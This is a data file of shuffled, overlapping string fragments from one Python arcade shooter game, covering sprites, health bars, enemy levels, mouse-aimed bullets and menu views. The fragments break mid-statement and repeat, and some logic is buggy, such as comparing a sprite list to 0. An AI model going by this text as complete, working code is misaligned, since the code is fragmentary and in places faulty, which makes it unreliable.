"health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy",
"- self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def",
"# color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the red",
"has an \"angle\" attribute that controls # the sprite rotation. Change this, and",
"start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y =",
"one health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0:",
"key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN:",
"= math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x #",
"SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list = None",
"0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 #",
"for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all",
"HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self,",
"= True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed =",
"over view \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK)",
"f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): #",
"self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key,",
"arrow keys on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x",
"else: self.good = False else: for i in range(self.amount_of_enemies): # Create the enemy",
"contents must be all ints\") # Remove one health point player.player_cur_health -= 1",
"Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: #",
"player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10",
"self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed",
"= 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health)",
"= 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50,",
"to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level +",
"self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH)",
"for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how",
"= random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if",
"is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y =",
"if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead",
"-10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale,",
"= MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and",
"\"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the",
"Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame()",
"math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x # and",
"Move the player \"\"\" # Move player around the screen self.center_x += self.change_x",
"SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT)",
"+= 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy,",
"Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x",
"1 else: self.good = False else: for i in range(self.amount_of_enemies): # Create the",
"enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2)",
"x_diff) # Taking into account the angle, calculate our change_x # and change_y.",
"# Rotate the coin. # The arcade.Sprite class has an \"angle\" attribute that",
"start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y,",
"SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure he cant",
"player in player_hit: # Make sure this is the right sprite if not",
"arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw",
"+= min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x",
"must be all ints\") # Remove one health point enemy.enemy_cur_health -= 1 #",
"import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3",
"None self.bullet_list = None # Set up the player self.player_sprite = None self.enemy_health",
"< 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top =",
"+ 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level",
"<= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else:",
"all ints\") # Remove one health point enemy.enemy_cur_health -= 1 # Check health",
"bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y +",
"Background image will be stored in this variable self.background = None def levels(self):",
"HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health):",
"bullet to the destination. x_diff = dest_x - start_x y_diff = dest_y -",
"#self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit =",
"see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it",
"SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape,",
"self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED #",
"0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output",
"for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY,",
"the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2)",
"out-of-bounds if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH -",
"enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3",
"start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y",
"not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED",
"start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4,",
"output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list:",
"arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite)",
"\"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE,",
"in hit_list: # Make sure this is the right sprite if not isinstance(enemy,",
"self.window.level > 3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create",
"Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu",
"screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all",
"key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe",
"in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main",
"random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list ==",
"self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers):",
"travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add",
"if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed =",
"<= 3: for i in range(self.amount_of_enemies): # Create the enemy image enemy =",
"key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False",
"enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the",
"x, y, button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound)",
"= ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy",
"main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class",
"key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the",
"lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else:",
"window.level = 0 # game = MyGame() # game.setup() # arcade.run() if __name__",
"45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list:",
"SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on",
"-10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def",
"# Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add",
"delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0",
"0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT",
"range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 =",
"start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y #",
"arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health",
"our change_x # and change_y. Velocity is how fast the bullet travels. bullet.change_x",
"if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1:",
"120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y +",
"self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED,",
"arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if",
"This tells the enemies to go to the main guy if self.center_y <",
"= False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be",
"Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x +",
"arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self):",
"= MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\"",
"arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y,",
"the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view)",
"# Check this bullet to see if it hit a enemy hit_list =",
"== arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif",
"enemy in hit_list: # Make sure this is the right sprite if not",
"= 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED =",
"208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard to move",
"= 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x",
"it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get",
"def player_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\"",
"start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard to move around\",",
"# Set up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 =",
"HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, #",
"> self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health",
"in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update()",
"300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self,",
"self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good",
"bullet at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x",
"he cant go off the screen if self.bottom < 0: self.bottom = 0",
"def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2,",
"10, color=arcade.color.RED) # Calculate width based on health start_x = 85 start_y =",
"self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left <",
"Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If",
"controls # the sprite rotation. Change this, and the sprite rotates. self.angle +=",
"BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to the lists",
"else: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\",",
"def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press to advance",
"= GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound)",
"15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE,",
"# Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output,",
"== arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def",
"100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\",",
"class GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\" def on_show(self):",
"self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x =",
"HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar #",
"height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health",
"= random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list",
"= SCREEN_WIDTH # Background image will be stored in this variable self.background =",
"Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom",
"Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet",
"SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT",
"hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid",
"self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy",
"and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy image",
"location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y",
"get the bullet to the destination. x_diff = dest_x - start_x y_diff =",
"key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True",
"start_y # Get from the mouse the destination location for the bullet dest_x",
"False def setup(self): # Set up the game # Sprite lists self.window.level =",
"arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270",
"bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED #",
"'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK)",
"Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list =",
"= 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard to",
"# The arcade.Sprite class has an \"angle\" attribute that controls # the sprite",
"* (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN)",
"self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else:",
"enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called",
"ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120,",
"# Move player around the screen self.center_x += self.change_x self.center_y += self.change_y #",
"# the sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle",
"arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number()",
"self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list:",
"coin. # The arcade.Sprite class has an \"angle\" attribute that controls # the",
"= 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y =",
"= f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self):",
"True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key. \"\"\"",
"render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) #",
"self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if",
"+ HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar",
"SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\")",
"at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x =",
"def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT,",
"= SCREEN_WIDTH - 1 # Make sure he cant go off the screen",
"self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3",
"if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1:",
"= arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400",
"to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240",
"# Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y,",
"switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render()",
"if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1 self.good =",
"min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y -",
"self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1",
"5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10",
"scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health",
"a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif",
"color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move player around the",
"on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press to advance to",
"self.right = SCREEN_WIDTH - 1 # Make sure he cant go off the",
"SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20",
"= .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET =",
"self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED,",
"'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class",
"the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y)",
"Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208",
"> 3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the",
"= 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10)",
"def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH,",
"for player in player_hit: # Make sure this is the right sprite if",
"image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 =",
"Position the bullet at the player's current location start_x = self.player_sprite.center_x start_y =",
"310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15)",
"self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good = False def",
"if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed =",
"self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health",
"GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\" def on_show(self): \"\"\"",
"destination location for the bullet dest_x = x dest_y = y # Do",
"ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self,",
"on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key ==",
"how to get the bullet to the destination. x_diff = dest_x - start_x",
"-1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\")",
"the bullet dest_x = x dest_y = y # Do math to calculate",
"= 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED,",
"* (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\"",
"self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be stored in",
"player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers):",
"self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite",
"\"angle\" attribute that controls # the sprite rotation. Change this, and the sprite",
"Make sure this is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List",
"self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False",
"Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and",
"= MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game",
"== 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif",
"how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,",
"self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y =",
"\"\"\" if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed",
"user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif",
"this is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must",
"background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) #",
"player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self,",
